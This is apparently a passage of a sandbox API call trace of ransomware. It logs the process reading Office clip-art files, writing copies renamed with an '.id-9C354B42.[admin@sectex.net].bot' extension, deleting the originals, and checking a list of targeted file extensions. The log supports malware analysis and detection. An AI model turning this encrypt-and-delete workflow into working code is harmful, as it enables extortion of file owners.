	[0143.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 0x20
	[0143.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.488] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.488] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0143.489] GetLastError () returned 0x0
	[0143.489] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xaac, lpOverlapped=0x0) returned 1
	[0143.542] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xab0, lpOverlapped=0x0) returned 1
	[0143.543] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.543] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.544] SetEndOfFile (hFile=0x25c) returned 1
	[0143.544] CloseHandle (hObject=0x25c) returned 1
	[0143.544] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.544] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.546] CloseHandle (hObject=0x3c4) returned 1
	[0143.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 1
	[0143.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.600] lstrlenW (lpString=".doc") returned 4
	[0143.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.600] lstrlenW (lpString=".docx") returned 5
	[0143.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.600] lstrlenW (lpString=".pdf") returned 4
	[0143.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.600] lstrlenW (lpString=".xls") returned 4
	[0143.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.605] lstrlenW (lpString=".xlsx") returned 5
	[0143.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.605] lstrlenW (lpString=".ppt") returned 4
	[0143.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.605] lstrlenW (lpString=".zip") returned 4
	[0143.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.605] lstrlenW (lpString=".rar") returned 4
	[0143.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString=".bz2") returned 4
	[0143.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString=".7z") returned 3
	[0143.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString=".dbf") returned 4
	[0143.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString=".1cd") returned 4
	[0143.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString=".jpg") returned 4
	[0143.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString=".doc") returned 4
	[0143.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString=".docx") returned 5
	[0143.606] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.606] lstrlenW (lpString=".pdf") returned 4
	[0143.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString=".xls") returned 4
	[0143.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.606] lstrlenW (lpString=".xlsx") returned 5
	[0143.606] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.606] lstrlenW (lpString=".ppt") returned 4
	[0143.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.606] lstrlenW (lpString=".zip") returned 4
	[0143.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.606] lstrlenW (lpString=".rar") returned 4
	[0143.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString=".bz2") returned 4
	[0143.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.606] lstrlenW (lpString=".7z") returned 3
	[0143.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.607] lstrlenW (lpString=".dbf") returned 4
	[0143.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.607] lstrlenW (lpString=".1cd") returned 4
	[0143.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63
	[0143.607] lstrlenW (lpString=".jpg") returned 4
	[0143.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.607] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.607] lstrlenW (lpString="BS01638_.WMF") returned 12
	[0143.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.607] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=10538) returned 1
	[0143.607] CloseHandle (hObject=0x3c0) returned 1
	[0143.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 0x20
	[0143.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.609] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.609] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.610] GetLastError () returned 0x0
	[0143.610] ReadFile (in: hFile=0x3c0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x292a, lpOverlapped=0x0) returned 1
	[0143.633] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2930, lpOverlapped=0x0) returned 1
	[0143.634] ReadFile (in: hFile=0x3c0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.634] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.634] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.634] CloseHandle (hObject=0x3b4) returned 1
	[0143.634] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.634] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.637] CloseHandle (hObject=0x3c0) returned 1
	[0143.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 1
	[0143.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString=".doc") returned 4
	[0143.638] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString=".docx") returned 5
	[0143.638] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.638] lstrlenW (lpString=".pdf") returned 4
	[0143.638] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString=".xls") returned 4
	[0143.638] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.638] lstrlenW (lpString=".xlsx") returned 5
	[0143.638] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.638] lstrlenW (lpString=".ppt") returned 4
	[0143.638] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString=".zip") returned 4
	[0143.638] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.638] lstrlenW (lpString=".rar") returned 4
	[0143.638] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString=".bz2") returned 4
	[0143.638] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString=".7z") returned 3
	[0143.638] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString=".dbf") returned 4
	[0143.638] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString=".1cd") returned 4
	[0143.638] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString=".jpg") returned 4
	[0143.638] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.639] lstrlenW (lpString=".doc") returned 4
	[0143.639] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString=".docx") returned 5
	[0143.639] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.639] lstrlenW (lpString=".pdf") returned 4
	[0143.639] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString=".xls") returned 4
	[0143.639] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.639] lstrlenW (lpString=".xlsx") returned 5
	[0143.639] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.639] lstrlenW (lpString=".ppt") returned 4
	[0143.639] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.639] lstrlenW (lpString=".zip") returned 4
	[0143.639] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.639] lstrlenW (lpString=".rar") returned 4
	[0143.639] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString=".bz2") returned 4
	[0143.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString=".7z") returned 3
	[0143.639] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.639] lstrlenW (lpString=".dbf") returned 4
	[0143.639] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.639] lstrlenW (lpString=".1cd") returned 4
	[0143.639] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63
	[0143.639] lstrlenW (lpString=".jpg") returned 4
	[0143.639] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.640] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.640] lstrlenW (lpString="CG1606.WMF") returned 10
	[0143.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.668] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3564) returned 1
	[0143.668] CloseHandle (hObject=0x3c4) returned 1
	[0143.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 0x20
	[0143.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.668] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.668] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.670] GetLastError () returned 0x0
	[0143.670] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xdec, lpOverlapped=0x0) returned 1
	[0143.672] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xdf0, lpOverlapped=0x0) returned 1
	[0143.673] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.673] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0143.673] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.673] CloseHandle (hObject=0x3c0) returned 1
	[0143.673] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.674] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.689] CloseHandle (hObject=0x3c4) returned 1
	[0143.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 1
	[0143.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.690] lstrlenW (lpString=".doc") returned 4
	[0143.690] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString=".docx") returned 5
	[0143.690] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0143.690] lstrlenW (lpString=".pdf") returned 4
	[0143.690] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString=".xls") returned 4
	[0143.690] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.690] lstrlenW (lpString=".xlsx") returned 5
	[0143.690] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0143.690] lstrlenW (lpString=".ppt") returned 4
	[0143.690] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.690] lstrlenW (lpString=".zip") returned 4
	[0143.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.690] lstrlenW (lpString=".rar") returned 4
	[0143.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString=".bz2") returned 4
	[0143.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString=".7z") returned 3
	[0143.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.690] lstrlenW (lpString=".dbf") returned 4
	[0143.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.690] lstrlenW (lpString=".1cd") returned 4
	[0143.691] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString=".jpg") returned 4
	[0143.691] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString=".doc") returned 4
	[0143.691] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString=".docx") returned 5
	[0143.691] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0143.691] lstrlenW (lpString=".pdf") returned 4
	[0143.691] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString=".xls") returned 4
	[0143.691] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.691] lstrlenW (lpString=".xlsx") returned 5
	[0143.691] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0143.691] lstrlenW (lpString=".ppt") returned 4
	[0143.691] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString=".zip") returned 4
	[0143.691] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.691] lstrlenW (lpString=".rar") returned 4
	[0143.691] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString=".bz2") returned 4
	[0143.691] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString=".7z") returned 3
	[0143.691] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString=".dbf") returned 4
	[0143.691] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.691] lstrlenW (lpString=".1cd") returned 4
	[0143.691] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61
	[0143.692] lstrlenW (lpString=".jpg") returned 4
	[0143.692] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.692] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.692] lstrlenW (lpString="CLASSIC2.WMF") returned 12
	[0143.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.692] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2262) returned 1
	[0143.692] CloseHandle (hObject=0x3c4) returned 1
	[0143.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 0x20
